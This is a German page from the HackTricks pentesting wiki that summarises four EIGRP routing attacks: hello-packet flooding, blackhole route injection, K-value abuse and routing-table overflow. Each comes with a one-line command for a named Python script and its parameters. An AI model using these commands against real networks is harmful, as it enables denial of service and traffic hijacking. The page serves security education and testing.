mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
5 KiB
5 KiB
EIGRP-Angriffe
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.
Dies ist eine Zusammenfassung der in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 aufgeführten Angriffe. Überprüfen Sie sie für weitere Informationen.
Angriff mit gefälschten EIGRP-Nachbarn
- Ziel: Überlastung der Router-CPU durch Fluten mit EIGRP-Hello-Paketen, was potenziell zu einem Denial-of-Service (DoS)-Angriff führen kann.
- Tool: Skript helloflooding.py.
- Ausführung: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
- Parameter:
--interface
: Gibt die Netzwerkschnittstelle an, z.B.eth0
.--as
: Definiert die EIGRP-autonome Systemnummer, z.B.1
.--subnet
: Legt den Subnetzstandort fest, z.B.10.10.100.0/24
.
EIGRP Blackhole-Angriff
- Ziel: Unterbrechung des Netzwerkverkehrsflusses durch Einspritzen einer falschen Route, die zu einem Blackhole führt, in dem der Verkehr zu einem nicht vorhandenen Ziel geleitet wird.
- Tool: Skript routeinject.py.
- Ausführung: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
- Parameter:
--interface
: Gibt die Netzwerkschnittstelle des Angreifers an.--as
: Definiert die EIGRP-AS-Nummer.--src
: Legt die IP-Adresse des Angreifers fest.--dst
: Legt die Ziel-Subnetz-IP fest.--prefix
: Definiert die Maske der Ziel-Subnetz-IP.
Missbrauch von K-Werten-Angriff
- Ziel: Kontinuierliche Störungen und Wiederverbindungen im EIGRP-Domäne durch Einspritzen veränderter K-Werte erzeugen, was effektiv zu einem DoS-Angriff führt.
- Tool: Skript relationshipnightmare.py.
- Ausführung: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
- Parameter:
--interface
: Gibt die Netzwerkschnittstelle an.--as
: Definiert die EIGRP-AS-Nummer.--src
: Legt die IP-Adresse eines legitimen Routers fest.
Routing-Tabelle-Überlauf-Angriff
- Ziel: Belastung der Router-CPU und des RAMs durch Fluten der Routing-Tabelle mit zahlreichen falschen Routen.
- Tool: Skript routingtableoverflow.py.
- Ausführung: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
- Parameter:
--interface
: Gibt die Netzwerkschnittstelle an.--as
: Definiert die EIGRP-AS-Nummer.--src
: Legt die IP-Adresse des Angreifers fest.
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.